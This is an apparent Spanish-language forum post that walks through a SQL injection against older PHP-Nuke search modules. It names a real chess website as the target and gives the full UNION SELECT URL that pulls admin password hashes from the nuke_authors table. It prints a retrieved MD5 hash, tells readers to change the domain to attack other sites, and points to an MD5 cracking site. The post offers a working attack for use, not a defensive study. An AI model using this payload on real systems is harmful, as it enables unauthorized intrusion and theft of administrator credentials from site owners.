Esto lo lei hace tiempo en inssecurity pero veo que aun es util.
Resulta que las versiones antiguas de nuke, hablemos de 7.5 hacia atras son vulnerables a una inyeccion de SQL que permite ver los hash (passwords encriptados) del admin y de algunos usuarios, aunque este error ya fue parchado en sus ultimas versiones aun hay webs que no han actualizado su nuke y siguen siendo vulnerables.
Aqui explico en que consiste:
Buscamos la web que queremos atacar en este caso lo hice con AjedrezOrinoco.com entramos en el web y buscamos el modulo de busqueda, generalmente modules.php?name=Search y colocamos nuestro codigo de SQL injection.
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Ya que en PHP-nuke los datos se envian por GET podemos hacer lo mismo directamente en la direccion.
http://ajedrezorinoco.com/modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Para atacar a otro web solo usen el codigo o en la URL cambia la direccion de ajedrez orinoco.
Ay noes muestra los resultados de la busqueda pero en lugar de los titulos de las noticias nos muestra el Hash
e141f494f13327099c5c6f9bd469a2f6
Enviado por webmaster el Wednesday, 31 December a las 15:59:59
Adjuntar al Artículo:
(0 responde)
este hash es el que debemos decriptar para obtener el password del admin
e141f494f13327099c5c6f9bd469a2f6para decriptarla puede usar cualquier programa de MD5 Cracking
o simplemente ve a
http://www.passcracking.com/
